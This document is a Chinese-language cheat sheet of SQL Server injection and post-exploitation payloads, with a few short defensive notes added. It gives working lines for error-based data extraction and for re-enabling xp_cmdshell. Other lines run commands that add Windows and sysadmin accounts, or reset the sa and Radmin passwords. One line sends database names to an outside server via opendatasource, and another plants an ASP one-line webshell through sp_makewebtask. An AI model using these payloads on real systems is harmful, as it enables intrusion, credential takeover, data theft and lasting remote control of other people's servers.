//查看当前权限(是否属于 db_owner 角色)
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='
注:这里利用的是字符串转 int 失败时的报错回显;应用改用参数化查询并关闭详细数据库错误输出后,这类语句不会返回信息。
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
注:0x730079007300610064006D0069006E00 是 N'sysadmin' 的十六进制(UTF-16LE)写法,检测规则只匹配 'sysadmin' 字面量时会漏掉这种形式;Web 应用所用的登录账号不应具有 sysadmin 角色。

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多语句(堆叠查询)
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
注:sp_addextendedproc 需要 sysadmin 权限;SQL Server 2005 起 xp_cmdshell 默认处于禁用状态,其启用状态的变更应纳入审计。

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
注:SQL Server 2005 起 OPENROWSET/OPENDATASOURCE 的即席访问(Ad Hoc Distributed Queries)默认关闭;同时应限制数据库服务器主动外连。
//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式(即改写 Jet 的 SandBoxMode 键值):
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:SandBoxMode 默认值为 2(对非 Access 程序启用沙盒),写成 1 后沙盒对非 Access 程序不再生效,因此该键值被改写是值得告警的迹象。

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
注:SQL Server 2005 起 Ole Automation Procedures(sp_OACreate 等)与 xp_cmdshell 默认禁用,且默认仅 sysadmin 可执行。

判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

数据库备份
backup database pubs to disk = 'c:\123.bak'
//爆出长度(D99_Tmp 表的记录数)
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序,但赋予的参数是 Process ID。
利用“工作管理员”(任务管理器),透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID。

xp_terminate_process 2484
xp_unpackcab
解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1

某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234。

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
注:sp_makewebtask 在 SQL Server 2005 中默认禁用,2008 起已移除;SQL Server 服务账号不应对 Web 目录有写权限。

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3